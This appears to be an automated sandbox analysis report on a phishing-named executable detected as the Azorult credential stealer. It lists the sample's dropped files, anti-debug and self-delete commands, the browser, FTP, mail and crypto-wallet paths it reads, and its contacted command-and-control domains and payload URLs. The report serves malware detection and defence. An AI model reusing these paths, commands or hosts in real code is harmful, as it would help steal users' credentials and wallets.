Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00406362 FindFirstFileW,FindClose, 0_2_00406362
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405810
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_00406362 FindFirstFileW,FindClose, 2_2_00406362
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_00405810
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 2_2_004027FB FindFirstFileW, 2_2_004027FB
Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005380000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe API call chain: ExitProcess graph end node
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00403868 GetTempPathW,LdrInitializeThunk,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,ShowWindow,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW, 0_2_00403868
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Code function: 0_2_00406041 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406041
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Azorult
Source: Yara match File source: 00000002.00000002.1404635132.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1429245765.0000000036590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment Advice Note_Pdf.exe PID: 7280, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTCMv
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dC:\Users\user\AppData\Roaming\Electrum\wallets\\ectrum.dattubsystem\Profiles\Outlooka
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Jaxx\Local Storage\*\*
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NC:\Users\user\AppData\Roaming\Exodus\\keystore\\\.dll
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Jaxx\Local Storage\*\*
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\ts\U
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus Eden\*t
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\ts\U
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NC:\Users\user\AppData\Roaming\Exodus\\keystore\\\.dll
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: >%appdata%\Electrum-LTC\wallets\Electrum\wallets\tlooka\\ZxcvbnData\Login Datajsondll
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Exodus Eden\ Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\ Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1353774402.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1428296777.0000000036140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment Advice Note_Pdf.exe PID: 7280, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522667 Sample: Payment Advice Note_Pdf.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 36 d4hk.shop 2->36 38 uktnl.vantechdns.com 2->38 44 Multi AV Scanner detection for domain / URL 2->44 46 Suricata IDS alerts for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 6 other signatures 2->50 9 Payment Advice Note_Pdf.exe 24 2->9         started        signatures3 process4 file5 24 C:\Users\user\toenailed\...\Skiftevis.sys, data 9->24 dropped 26 C:\Users\user\AppData\Local\...\System.dll, PE32 9->26 dropped 52 Sample is not signed and drops a device driver 9->52 13 Payment Advice Note_Pdf.exe 63 9->13         started        signatures6 process7 dnsIp8 40 d4hk.shop 172.67.215.93, 49754, 49755, 80 CLOUDFLARENETUS United States 13->40 42 uktnl.vantechdns.com 172.93.121.126, 443, 49753 HOST4GEEKS-LLCUS United States 13->42 28 C:\Users\user\AppData\...\vcruntime140.dll, PE32 13->28 dropped 30 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32 13->30 dropped 32 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 13->32 dropped 34 45 other files (none is malicious) 13->34 dropped 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->54 56 Tries to steal Instant Messenger accounts or passwords 13->56 58 Tries to steal Mail credentials (via file / registry access) 13->58 60 6 other signatures 13->60 18 cmd.exe 1 13->18         started        file9 signatures10 process11 process12 20 conhost.exe 18->20         started        22 timeout.exe 1 18->22         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.215.93
 d4hk.shop United States
13335 CLOUDFLARENETUS true
172.93.121.126
 uktnl.vantechdns.com United States
393960 HOST4GEEKS-LLCUS false

Contacted Domains

Name IP Active
d4hk.shop 172.67.215.93 true
uktnl.vantechdns.com 172.93.121.126 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://d4hk.shop/MI341/index.php true unknown
https://uktnl.vantechdns.com/Hpgcc91.bin false
    		unknown